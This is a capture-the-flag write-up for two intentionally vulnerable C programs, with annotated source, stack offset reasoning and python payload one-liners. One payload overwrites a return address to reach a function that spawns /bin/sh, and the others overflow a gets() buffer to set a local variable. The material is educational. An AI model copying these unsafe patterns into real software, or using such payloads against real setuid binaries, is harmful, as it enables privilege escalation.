Easy - No Protections
Simple Buffer Overflow (no protection) - Function call
# Code
/*
 * Copy the caller-supplied string into a fixed 50-byte stack buffer and echo it.
 *
 * Defect: strcpy() has no bound, so any arg of 50 bytes or more (terminator
 * included) runs past `ordre` and overwrites whatever the compiler laid out
 * after it on the stack; the writeup below relies on exactly this.
 * Mitigation: bound the copy (snprintf(ordre, sizeof ordre, "%s", arg)) and
 * build with the usual hardening (stack protector, NX, PIE/ASLR).
 *
 * @param arg  NUL-terminated string of untrusted length (argv[1] in main).
 */
void copy_ordre(char *arg)
{
char ordre[50];
strcpy(ordre,arg); /* unbounded copy: stack-based buffer overflow */
printf("Ordre reçu : %s\n",ordre);
}
/*
 * Entry point: prints the banner, hands argv[1] to copy_ordre() unvalidated,
 * then always reaches earth_destroy().
 *
 * Notes for the reader:
 *  - earth_destroy() is defined further down with no prototype in view, so
 *    this call relies on an implicit declaration (an error in modern C).
 *  - earth_alive() is never called from normal control flow; it is only
 *    reachable if the return path of copy_ordre() is corrupted.
 *  - argv[1] length is never checked before the copy.
 *
 * @return 0 after earth_destroy(); exits with 0 on missing argument.
 */
int main(int argc, char** argv) {
if(argc < 2) {
printf("Bienvenue, humain. Donnez-nous vos ordres. En cas de bonne réponse, nous vous épargnerons. Le cas échéant, nous détruirons la terre.");
printf("Usage: %s <ordre>", argv[0]);
exit(0);
}
printf("Bienvenue, humain. Donnez-nous vos ordres. En cas de bonne réponse, nous vous épargnerons. Le cas échéant, nous détruirons la terre.");
copy_ordre(argv[1]); /* untrusted, unbounded input goes into a 50-byte buffer */
earth_destroy();     /* implicit declaration: defined below main without a prototype */
return 0;
}
/* Prints the "wrong answer" message; this is the only outcome main() reaches
 * on its own. Declared after its use in main(), hence the implicit declaration. */
void earth_destroy() {
printf("Mauvaise réponse ! Nous détruirons votre planète dans quelques minutes.");
}
/*
 * Win function of the challenge: prints the victory message and replaces the
 * process with /bin/sh. Nothing in the visible code calls it; it exists only
 * as the target a hijacked return address is meant to land on.
 *
 * Defender's note: execve("/bin/sh") with no argv/envp inherits the process'
 * credentials, so on a setuid binary this is a privilege escalation primitive.
 * Outside a deliberately vulnerable CTF target a function like this is a
 * backdoor and should not be present at all.
 */
void earth_alive() {
printf("Nous nous avouons vaincu. Vous avez gagné, nous vous rendons la terre !");
execve("/bin/sh", NULL, NULL); /* argv == NULL is non-portable; kept as in the challenge */
}
# Explanations and Exploit
# The goal is to call the earth_alive() function
# The buffer is 50 bytes long, so by submitting more than 50 characters you overwrite what lies after it on the stack
# You have EIP, EBP and one argument (char) on the stack, so 12 bytes
# So, to override what you want and call the function, you will need to send 62 char before the payload
# The payload is the address of the function you want to send
$ nm ./pwn1 | grep "earth_alive"
08048acb T earth_alive
# So, the payload will be the following
./pwn1 $(python -c 'print "A"*62 + "\xcb\x8a\x04\x08"')
Simple BoF - Int override
# Code
/*
 * Read one line into a 20-byte stack buffer and, if the neighbouring local
 * `x` happens to equal 1234, print the contents of flag.txt.
 *
 * Defects:
 *  - gets() has no length limit (removed from the language in C11); input
 *    longer than `buf` overwrites adjacent stack memory. `x` is only ever
 *    assigned 0 in the code, so the 1234 comparison can only succeed via
 *    that overflow (the writeup below gives the offset it observed).
 *  - fopen() is not checked; if flag.txt is missing, fgets() dereferences NULL.
 *  - fgets() return is not checked, so `flag` may be printed uninitialized.
 *  - the (FILE*) cast on fp is redundant.
 *  - the privilege-drop lines (getegid/setresgid) are commented out, so the
 *    process keeps whatever effective gid it started with.
 * Mitigation: fgets(buf, sizeof buf, stdin), check fp and the fgets() result.
 *
 * @return 0 always.
 */
int main() {
char buf[20];
int x = 0; /* only assignment in the program; reaching 1234 requires memory corruption */
gets(buf); /* unbounded read from stdin */
if (x == 1234) {
// gid_t gid = getegid();
// setresgid(gid, gid, gid);
FILE *fp;
fp = fopen("flag.txt", "r"); /* unchecked: NULL when the file is absent */
char flag[64];
fgets(flag, 64, (FILE*) fp); /* cast is redundant; result unchecked */
printf("Oh, un flag : %s", flag);
}
printf("x value : %d", x);
return 0;
}
# Exploitation and Explanations
# You want to overwrite the “x” value
# In the stack, 20 bytes are reserved for the buffer and 4 bytes for a pointer to this buffer.
# After that comes the value of x, so you can overflow here
$ python -c 'print "a"*24 + "\xd2\x04\x00\x00"' | ./pwn0
$ python -c 'print "a"*24 + "\xd2\x04"' | ./pwn0
$ python -c 'print "a"*22 + "\x00\x00\xd2\x04"' | ./pwn0